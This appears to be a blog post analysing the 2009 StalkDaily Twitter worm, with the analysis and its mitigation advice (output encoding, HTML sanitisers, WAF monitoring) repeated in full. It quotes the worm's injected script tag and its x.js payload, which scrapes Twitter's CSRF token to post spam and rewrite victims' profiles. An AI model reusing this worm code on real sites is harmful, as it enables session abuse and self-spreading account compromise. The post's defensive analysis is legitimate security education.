In case you were too busy hunting for Easter Eggs this past week-end, you may have missed the fact that Twitter was hit with Cross-site Request Forgery worm attacks. Many news outlets are labeling these as Cross-site Scripting Attacks, which is true, however Cross-site Request Forgery is more accurate. Let's look at these definitions:
Cross-site Scripting "occurs whenever an application takes user supplied data and sends it to a web browser without first validating or encoding that content. XSS allows attackers to execute script in the victim's browser which can hijack user sessions, deface web sites, possibly introduce worms, etc." This definition does hold true for the Twitter worms as the malicious payload was sent to user's browsers and it would execute.
Cross-site Request Forgery "attack forces a logged-on victim's browser to send a pre-authenticated request to a vulnerable web application, which then forces the victim's browser to perform a hostile action to the benefit of the attacker. CSRF can be as powerful as the web application that it attacks." This definition is more accurate as the malicious javascript payload is forcing a logged in Twitter user to update their profile to include the worm javascript. The fact that the javascript code is leveraging the user's session token data to send an unintential request back to the application is the essence of a CSRF attack.
In my previous post I mentioned how it was difficult to neatly place attacks into just one category. Was this an XSS attack or a CSRF attack? In actuality it was both. These worm attacks leveraged a lack of proper output encoding to launch an XSS attack, however the payload itself was CSRF.
The attacks targeted Twitter user's "profile" component and injected javascript similar to the following:
<a href="http://www.stalkdaily.com"/><script src="hxxp://mikeyylolz.uuuq.com/x.js">
The "<script>" data is what was getting injected into people’s profiles. Taking a quick look at the "x.js" script, we see the following:
var update = urlencode("Hey everyone, join www.StalkDaily.com. It’s a site like Twitter but with pictures, videos, and so much more! :)");var xss = urlencode(’http://www.stalkdaily.com"></a><script src="http://mikeyylolz.uuuq.com/x.js"></script><script src="http://mikeyylolz.uuuq.com/x.js"></script><a ‘);
var ajaxConn = new XHConn();ajaxConn.connect("/status/update", "POST", "authenticity_token="+authtoken+"&status="+update+"&tab=home&update=update");ajaxConn1.connect("/account/settings", "POST", "authenticity_token="+authtoken+"&user[url]="+xss+"&tab=home&update=update");
The CSRF code is using an AJAX call to stealthily send the request to Twitter without the user's knowledge. It is issuing a POST command to the "/status/update" page with the appropriate parameter data to modify the "user[url]" data. Also important to note - Twitter was using a CSRF token (called authenticity_token) to help prevent these types of attacks. This is the perfect example of why, if your web application has XSS vulnerabilities, that the use of a CSRF token is useless for local attacks. As you can see in the payload above, the XSS AJAX code is simply scraping the authenticity_token data from within the browser and sending it with the attack payload.
The Cortesi blog has an excellent technical write-up of what is happening -
What’s happening here is that it looks like somebody realized they could save url encoded data to the profile URL field that would not be properly escaped when re-displayed. This is particularly nasty because you could get infected simply by viewing somebody’s profile page on Twitter that was already infected. If you visited an infected profile, the JavaScript in the profile would execute and by doing so tweet the mis-leading link, and update your profile with the same malicious JavaScript thereby infecting anybody that then visits your profile on twitter.com.
Defenses/Mitigations - Users
Use the NoScript plugin for Firefox as it will allow you to pick and choose when/where/what javascript you want to allow to run.
Defenses/Mitigations - Web Apps
Disallowing clients from submitting any html code is manageable, however you still need to be able to canonicalize the data before applying any your filters. If done properly, you can simply look for html/scripting tags and data and disallow it entirely. What is challenging is when you have allow your clients to submit html code, however you want to disallow malicious code. Wiki sites, blogs and social media sites such as Twitter have to allow their clients some ability to upload html data. For situation such as this, an applications such as the OWASP AntiSamy package or HTMLPurifier are excellent choices.
Although allowing some level of basic html code changing is understandable, adding in scripting code is different. One aspect of monitoring that can be done (by a web application firewall) is to monitor and track the use of scripting code per resource. By tracking this type of meta-data, you could identify if *any* scripting code is suddenly appearing on a page (when previously there was none) or if there are, say 2 "<script>" tags on a page and now there are 3. This would indicate some sort of an application change. Once alerted to this, the next question is - Was this a legitimate change or something malicious? If Twitter had been using this type of monitoring, they would have been alerted as soon as "Victim Zero" (in this case - the worm originator) altered his profile URL with the encoded Javascript data.
What’s happening here is that it looks like somebody realized they could save url encoded data to the profile URL field that would not be properly escaped when re-displayed. This is particularly nasty because you could get infected simply by viewing somebody’s profile page on Twitter that was already infected. If you visited an infected profile, the JavaScript in the profile would execute and by doing so tweet the mis-leading link, and update your profile with the same malicious JavaScript thereby infecting anybody that then visits your profile on twitter.com.
Defenses/Mitigations - Users
Use the NoScript plugin for Firefox as it will allow you to pick and choose when/where/what javascript you want to allow to run.
Defenses/Mitigations - Web Apps
Disallowing clients from submitting any html code is manageable, however you still need to be able to canonicalize the data before applying any your filters. If done properly, you can simply look for html/scripting tags and data and disallow it entirely. What is challenging is when you have allow your clients to submit html code, however you want to disallow malicious code. Wiki sites, blogs and social media sites such as Twitter have to allow their clients some ability to upload html data. For situation such as this, an applications such as the OWASP AntiSamy package or HTMLPurifier are excellent choices.
Although allowing some level of basic html code changing is understandable, adding in scripting code is different. One aspect of monitoring that can be done (by a web application firewall) is to monitor and track the use of scripting code per resource. By tracking this type of meta-data, you could identify if *any* scripting code is suddenly appearing on a page (when previously there was none) or if there are, say 2 "<script>" tags on a page and now there are 3. This would indicate some sort of an application change. Once alerted to this, the next question is - Was this a legitimate change or something malicious? If Twitter had been using this type of monitoring, they would have been alerted as soon as "Victim Zero" (in this case - the worm originator) altered his profile URL with the encoded Javascript data.
2 comments:
I just became a twitter user before 1 month. I am unknown about so much twitter application. Can any one tell me about retweet.
Visit
hi! This template is simply super... http://www.itemplatez.com
Post a Comment